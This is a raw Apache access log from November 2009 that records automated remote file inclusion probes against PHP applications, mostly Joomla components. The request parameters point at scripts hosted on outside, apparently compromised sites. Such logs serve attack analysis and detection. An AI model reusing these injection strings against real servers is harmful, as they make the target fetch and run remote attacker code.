208.89.214.167 - - [01/Nov/2009:01:21:23 -0400] "GET /principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:21:23 -0400] "GET /logs/principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:21:24 -0400] "GET /principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:21:24 -0400] "GET /logs/principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:21:27 -0400] "GET /logs/access_log.Q109062300/principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:21:42 -0400] "GET /logs/access_log.Q109062300%20%20/principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:21:56 -0400] "GET /principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:21:56 -0400] "GET /logs/principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:21:57 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:21:57 -0400] "GET /logs/access_log.Q109071600////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:21:57 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
123.125.66.118 - - [01/Nov/2009:01:22:01 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.78.116.203 - - [01/Nov/2009:01:22:07 -0400] "GET ///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:22:07 -0400] "GET /logs/access_log.Q109081200%20%20///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:22:07 -0400] "GET /logs///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:22:11 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:22:11 -0400] "GET /logs/access_log.Q109071600////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:22:11 -0400] "GET ///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:22:11 -0400] "GET /logs/access_log.Q109081200%20%20///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:22:12 -0400] "GET /logs///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:22:11 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:01:22:17 -0400] "GET /logs/access_log.Q109062300/principal.php?conteudo=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:22:18 -0400] "GET /logs/access_log.Q109072200%20%20///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:22:19 -0400] "GET /logs/error_log.Q109090500////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:22:21 -0400] "GET /logs/access_log.Q109072200%20%20///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:22:25 -0400] "GET /logs/error_log.Q109090500////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:01:22:59 -0400] "GET /logs/access_log.Q109081700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:01:23:17 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:01:23:31 -0400] "GET /logs/error_log.Q109102000 HTTP/1.0" 200 3642071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.110.164 - - [01/Nov/2009:01:23:32 -0400] "GET /logs/error_log.Q109102000 HTTP/1.0" 200 3642071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
117.110.59.2 - - [01/Nov/2009:01:24:16 -0400] "GET ///skin/sirini_ezset/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.110.59.2 - - [01/Nov/2009:01:24:16 -0400] "GET /logs///skin/sirini_ezset/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:01:24:16 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:24:16 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:24:16 -0400] "GET /appserv/main.php?appserv_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:24:16 -0400] "GET /appserv/main.php?appserv_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:24:17 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:24:17 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.808"
209.59.12.99 - - [01/Nov/2009:01:24:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.64.94.64 - - [01/Nov/2009:01:24:30 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:24:30 -0400] "GET /logs/access_log.Q109071100//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:24:30 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:24:30 -0400] "GET /logs/access_log.Q109092600//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:01:24:50 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:01:24:50 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:01:24:50 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:01:24:55 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:24:55 -0400] "GET /logs/access_log.Q109101700%20%20////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:24:55 -0400] "GET /logs/access_log.Q109071600%20%20////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:01:24:58 -0400] "GET /logs/access_log.Q109092600/appserv/main.php?appserv_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:24:58 -0400] "GET /logs/access_log.Q109092600/appserv/main.php?appserv_root=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
222.122.46.179 - - [01/Nov/2009:01:25:15 -0400] "GET /logs/access_log.Q109071600%20%20////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:25:15 -0400] "GET /logs/access_log.Q109101700%20%20////?_SERVER[DOCUMENT_ROOT]=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:01:25:44 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:01:25:44 -0400] "GET /logs/access_log.Q109053100//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:01:25:44 -0400] "GET /logs/access_log.Q109062100//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:01:25:44 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 24203 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:01:25:45 -0400] "GET /logs/access_log.Q109053100//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:01:25:45 -0400] "GET /logs/access_log.Q109062100//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:01:25:45 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:01:25:45 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 24203 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:25:48 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:25:48 -0400] "GET /logs/access_log.Q109081200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
114.108.177.238 - - [01/Nov/2009:01:25:48 -0400] "GET /logs/access_log.Q109072900//?path%5Bdocroot%5D=http://www.duna21.co.kr/bbs/icon/icon1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:25:48 -0400] "GET /logs/access_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:25:48 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:25:55 -0400] "GET /?INCLUDE_FOLDER=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
204.3.182.177 - - [01/Nov/2009:01:26:01 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.7806320.ru/image?? HTTP/1.0" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
204.3.182.177 - - [01/Nov/2009:01:26:01 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.7806320.ru/image?? HTTP/1.0" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
222.73.17.7 - - [01/Nov/2009:01:26:14 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:14 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:16 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:16 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:18 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:18 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:21 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:21 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:26:23 -0400] "GET /logs/access_log.Q109071100%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:26:23 -0400] "GET /logs/access_log.Q109092600%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:23 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:23 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:25 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:25 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:26:28 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:26:28 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:26:28 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:26:28 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:26:34 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:26:34 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:26:34 -0400] "GET /logs/access_log.Q109100300%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:26:34 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:26:35 -0400] "GET /logs/access_log.Q109081200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
83.103.72.130 - - [01/Nov/2009:01:26:35 -0400] "GET /logs/access_log.Q109060900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hoodi.net.tw/phpbb2/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:42 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:42 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:42 -0400] "GET /logs/access_log.Q109082100//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:42 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:42 -0400] "GET //index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:42 -0400] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:42 -0400] "GET /logs/access_log.Q109082100//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:42 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:26:44 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:26:44 -0400] "GET /logs/access_log.Q109100300%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:53 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:26:53 -0400] "GET /logs/access_log.Q109061500%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:27:03 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:27:03 -0400] "GET /logs/access_log.Q109061500%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.143.3.188 - - [01/Nov/2009:01:27:28 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
174.143.3.188 - - [01/Nov/2009:01:27:28 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
174.143.3.188 - - [01/Nov/2009:01:27:29 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
174.143.3.188 - - [01/Nov/2009:01:27:29 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
121.78.116.203 - - [01/Nov/2009:01:27:35 -0400] "GET /logs/access_log.Q109081200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:27:35 -0400] "GET /logs/access_log.Q109072200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:27:38 -0400] "GET /logs/access_log.Q109081200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:27:38 -0400] "GET /logs/access_log.Q109072200///include/header.inc.php?skin_board_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:27:50 -0400] "GET /logs/error_log.Q109071800%20%20/?INCLUDE_FOLDER=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:27:50 -0400] "GET /logs/error_log.Q109072900%20%20/?INCLUDE_FOLDER=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:01:27:50 -0400] "GET /logs/?INCLUDE_FOLDER=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:01:27:58 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
